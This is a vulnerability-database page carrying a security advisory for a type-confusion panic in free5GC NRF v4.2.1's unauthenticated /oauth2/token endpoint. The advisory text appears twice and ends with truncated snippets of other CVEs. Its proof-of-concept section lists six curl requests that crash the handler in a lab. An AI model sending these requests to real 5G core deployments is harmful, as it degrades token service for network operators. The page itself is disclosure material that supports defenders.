Severity by source
AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Primary rating from GitHub Advisory · only source for this CVE.
CVSS VectorGitHub Advisory
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Lifecycle Timeline
1DescriptionGitHub Advisory
Summary
free5GC's NRF root SBI endpoint POST /oauth2/token contains a parser-level type-confusion bug family. The handler in NFs/nrf/internal/sbi/api_accesstoken.go reflects over models.NrfAccessTokenAccessTokenReq, special-cases only plain string and NrfNfManagementNfType fields, and treats every other field as if it were a single models.PlmnId. The parsed *models.PlmnId is then assigned with reflect.Value.Set() to whichever field name the attacker put in the form body, which panics whenever the destination field's real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into HTTP 500, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable across at least 6 confirmed crashing fields.
Note: /oauth2/token is unauthenticated by design (it is the OAuth2 token-issuance endpoint). So this is NOT framed as an auth-bypass finding -- it is a parser bug on an intentionally unauthenticated SBI endpoint.
Details
Validated against the NRF container in the official Docker compose lab.
- Source repo tag:
v4.2.1 - Running Docker image:
free5gc/nrf:v4.2.1 - Docker validation date: 2026-03-22
- NRF endpoint:
http://10.100.200.3:8000
Root cause is in the access-token request parser:
NFs/nrf/internal/sbi/api_accesstoken.go:52NFs/nrf/internal/sbi/api_accesstoken.go:87NFs/nrf/internal/sbi/api_accesstoken.go:98NFs/nrf/internal/sbi/api_accesstoken.go:100NFs/nrf/internal/sbi/api_accesstoken.go:112
The model definition lives in free5gc/openapi:
models/model_nrf_access_token_access_token_req.go:27models/model_nrf_access_token_access_token_req.go:29models/model_nrf_access_token_access_token_req.go:30models/model_nrf_access_token_access_token_req.go:31
The parser's effective shape is: parse value as *models.PlmnId, then dstField.Set(reflect.ValueOf(parsedPlmnId)). Every destination field that is NOT string and NOT NrfNfManagementNfType falls into this branch, so any time the destination is a slice ([]models.PlmnId, []models.Snssai, []models.PlmnIdNid, []string) or a different pointer type (*models.PlmnIdNid), the reflect.Set call panics with a runtime type-confusion error.
Confirmed crashing fields in this DoS family (all reachable from a single unauthenticated form-encoded POST):
requesterPlmnList-> panic assigning*models.PlmnIdto[]models.PlmnIdrequesterSnssaiList-> panic assigning*models.PlmnIdto[]models.SnssairequesterSnpnList-> panic assigning*models.PlmnIdto[]models.PlmnIdNidtargetSnpn-> panic assigning*models.PlmnIdto*models.PlmnIdNidtargetSnssaiList-> panic assigning*models.PlmnIdto[]models.SnssaitargetNsiList-> panic assigning*models.PlmnIdto[]string
PoC
Reproduced end-to-end against the running NRF at http://10.100.200.3:8000. Each of the following single requests independently crashes the handler.
requesterPlmnList->[]models.PlmnIdmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterPlmnList={"mcc":"208","mnc":"93"}'requesterSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnssaiList={"mcc":"208","mnc":"93"}'requesterSnpnList->[]models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnpnList={"mcc":"208","mnc":"93"}'targetSnpn->*models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnpn={"mcc":"208","mnc":"93"}'targetSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnssaiList={"mcc":"208","mnc":"93"}'targetNsiList->[]stringmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetNsiList={"mcc":"208","mnc":"93"}'Observed response (per request, no body returned):
HTTP/1.1 500 Internal Server Error
Content-Length: 0NRF container logs (docker logs nrf) confirm the reflect.Set type-confusion panic in HTTPAccessTokenRequest, with the panic message changing per field type:
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnId
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.Snssai
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type *models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []string
INFO][NRF][GIN] | 500 | POST | /oauth2/token |Impact
Type-confusion panic family (CWE-843) in the form-parser of an unauthenticated, network-reachable, root token-issuance endpoint, with no input validation on field types (CWE-20) and no defensive handling of the resulting panic before reflection (CWE-755).
This is NOT framed as an auth-bypass finding: /oauth2/token is unauthenticated by design. It is also NOT a process-kill DoS: Gin recovery catches each panic and the NRF process keeps running, so legitimate clients can still get tokens between attacker requests.
What the bug realistically gives an off-path attacker:
- A reliable, unauthenticated, repeatable panic primitive on the root token endpoint, reachable from a single form-encoded POST.
- Per-request CPU + log-write cost that is materially higher than a normal validation reject (
400) would have been, because the panic generates a stack trace each time. - A class of at least 6 attacker-selectable form keys that all crash via the same root cause, so partial fixes that harden one field do not close the family.
- Sustained-attack potential: under flood, the panic-amplification can degrade NRF token issuance (more expensive than
400validation) and pollute logs / rotate out useful diagnostic history.
No Confidentiality impact (HTTP 500 with empty body, no stack trace returned to the caller). No Integrity impact (panic happens before any state change). Availability impact is limited to per-request degradation under sustained attack; a single request does not deny service to other clients.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/918 Upstream fix: https://github.com/free5gc/nrf/pull/83
Analysis
Summary
free5GC's NRF root SBI endpoint POST /oauth2/token contains a parser-level type-confusion bug family. The handler in NFs/nrf/internal/sbi/api_accesstoken.go reflects over models.NrfAccessTokenAccessTokenReq, special-cases only plain string and NrfNfManagementNfType fields, and treats every other field as if it were a single models.PlmnId. The parsed *models.PlmnId is then assigned with reflect.Value.Set() to whichever field name the attacker put in the form body, which panics whenever the destination field's real type is incompatible (slice, different struct, primitive). Gin recovery converts each panic into HTTP 500, but the endpoint remains remotely panicable from a single unauthenticated form-encoded request and is repeatedly triggerable across at least 6 confirmed crashing fields.
Note: /oauth2/token is unauthenticated by design (it is the OAuth2 token-issuance endpoint). So this is NOT framed as an auth-bypass finding -- it is a parser bug on an intentionally unauthenticated SBI endpoint.
Details
Validated against the NRF container in the official Docker compose lab.
- Source repo tag:
v4.2.1 - Running Docker image:
free5gc/nrf:v4.2.1 - Docker validation date: 2026-03-22
- NRF endpoint:
http://10.100.200.3:8000
Root cause is in the access-token request parser:
NFs/nrf/internal/sbi/api_accesstoken.go:52NFs/nrf/internal/sbi/api_accesstoken.go:87NFs/nrf/internal/sbi/api_accesstoken.go:98NFs/nrf/internal/sbi/api_accesstoken.go:100NFs/nrf/internal/sbi/api_accesstoken.go:112
The model definition lives in free5gc/openapi:
models/model_nrf_access_token_access_token_req.go:27models/model_nrf_access_token_access_token_req.go:29models/model_nrf_access_token_access_token_req.go:30models/model_nrf_access_token_access_token_req.go:31
The parser's effective shape is: parse value as *models.PlmnId, then dstField.Set(reflect.ValueOf(parsedPlmnId)). Every destination field that is NOT string and NOT NrfNfManagementNfType falls into this branch, so any time the destination is a slice ([]models.PlmnId, []models.Snssai, []models.PlmnIdNid, []string) or a different pointer type (*models.PlmnIdNid), the reflect.Set call panics with a runtime type-confusion error.
Confirmed crashing fields in this DoS family (all reachable from a single unauthenticated form-encoded POST):
requesterPlmnList-> panic assigning*models.PlmnIdto[]models.PlmnIdrequesterSnssaiList-> panic assigning*models.PlmnIdto[]models.SnssairequesterSnpnList-> panic assigning*models.PlmnIdto[]models.PlmnIdNidtargetSnpn-> panic assigning*models.PlmnIdto*models.PlmnIdNidtargetSnssaiList-> panic assigning*models.PlmnIdto[]models.SnssaitargetNsiList-> panic assigning*models.PlmnIdto[]string
PoC
Reproduced end-to-end against the running NRF at http://10.100.200.3:8000. Each of the following single requests independently crashes the handler.
requesterPlmnList->[]models.PlmnIdmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterPlmnList={"mcc":"208","mnc":"93"}'requesterSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnssaiList={"mcc":"208","mnc":"93"}'requesterSnpnList->[]models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'requesterSnpnList={"mcc":"208","mnc":"93"}'targetSnpn->*models.PlmnIdNidmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnpn={"mcc":"208","mnc":"93"}'targetSnssaiList->[]models.Snssaimismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetSnssaiList={"mcc":"208","mnc":"93"}'targetNsiList->[]stringmismatch:
curl -i -X POST http://10.100.200.3:8000/oauth2/token \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data-urlencode 'targetNsiList={"mcc":"208","mnc":"93"}'Observed response (per request, no body returned):
HTTP/1.1 500 Internal Server Error
Content-Length: 0NRF container logs (docker logs nrf) confirm the reflect.Set type-confusion panic in HTTPAccessTokenRequest, with the panic message changing per field type:
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnId
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.Snssai
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type *models.PlmnIdNid
[ERRO][NRF][GIN] panic: reflect.Set: value of type *models.PlmnId is not assignable to type []string
INFO][NRF][GIN] | 500 | POST | /oauth2/token |Impact
Type-confusion panic family (CWE-843) in the form-parser of an unauthenticated, network-reachable, root token-issuance endpoint, with no input validation on field types (CWE-20) and no defensive handling of the resulting panic before reflection (CWE-755).
This is NOT framed as an auth-bypass finding: /oauth2/token is unauthenticated by design. It is also NOT a process-kill DoS: Gin recovery catches each panic and the NRF process keeps running, so legitimate clients can still get tokens between attacker requests.
What the bug realistically gives an off-path attacker:
- A reliable, unauthenticated, repeatable panic primitive on the root token endpoint, reachable from a single form-encoded POST.
- Per-request CPU + log-write cost that is materially higher than a normal validation reject (
400) would have been, because the panic generates a stack trace each time. - A class of at least 6 attacker-selectable form keys that all crash via the same root cause, so partial fixes that harden one field do not close the family.
- Sustained-attack potential: under flood, the panic-amplification can degrade NRF token issuance (more expensive than
400validation) and pollute logs / rotate out useful diagnostic history.
No Confidentiality impact (HTTP 500 with empty body, no stack trace returned to the caller). No Integrity impact (panic happens before any state change). Availability impact is limited to per-request degradation under sustained attack; a single request does not deny service to other clients.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/918 Upstream fix: https://github.com/free5gc/nrf/pull/83
An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl
runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac
Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a
Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/
The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post
Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build
Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l
Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c
Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2
An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du
Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve
Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at
Same weakness CWE-20 – Improper Input Validation
View allSame technique Denial Of Service
View allShare
External POC / Exploit Code
Leaving vuln.today
EUVD-2026-32573
GHSA-f8qv-7x5w-qr48